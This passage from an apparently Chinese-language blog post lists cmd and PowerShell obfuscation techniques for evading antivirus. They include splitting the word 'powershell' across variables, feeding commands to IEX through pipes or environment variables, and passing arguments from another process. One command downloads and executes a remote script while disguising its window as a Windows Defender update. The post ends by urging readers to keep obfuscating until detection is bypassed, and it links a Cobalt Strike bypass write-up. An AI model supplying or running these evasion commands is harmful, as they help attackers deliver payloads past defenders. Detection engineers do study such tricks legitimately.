<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell -"</pre>

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">cmd /c "set p1=power&& set p2=shell&& cmd /c echo Write-Host SUCCESS -Fore Green ^|%p1%%p2% -"</pre>

管道輸入流：

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell IEX $input"</pre>

利用環(huán)境變量：

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&powershell IEX $env:cmd"</pre>

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&cmd /c echo %cmd%|powershell -</pre>

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&powershell IEX ([Environment]::GetEnvironmentVariable('cmd', 'Process'))</pre>

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">cmd.exe /c "set cmd=Write-Host ENV -Fore Green&&powershell IEX ((Get-ChildItem/ChildItem/GCI/DIR/LS env:cmd).Value)</pre>

從其他進(jìn)程獲取參數(shù)：

<pre style="margin: 15px auto; padding: 10px; max-width: 690px; box-sizing: border-box; overflow-wrap: break-word !important; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; border-width: 0px; border-style: initial; border-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 15px; line-height: 26px; vertical-align: baseline; font-family: 微軟雅黑, &quot;Microsoft YaHei&quot;, &quot;WenQuanYi Micro Hei&quot;, PingFangSC; outline: none; max-height: 600px; overflow: auto; background: rgb(248, 248, 248); color: rgb(89, 89, 89); word-break: break-word; white-space: pre-wrap; text-align: start;">cmd /c "title WINDOWS_DEFENDER_UPDATE&&echo IEX (IWR https://7ell.me/power)&& FOR /L %i IN (1,1,1000) DO echo"</pre>

免殺要不斷嘗試，活學(xué)活用赵誓，一次混淆不行多混淆幾次打毛，加上替換關(guān)鍵字等。

參考鏈接：

https://y4er.com/post/cobalt-strike-powershell-bypass/

https://www.cnblogs.com/linuxsec/articles/7384582.html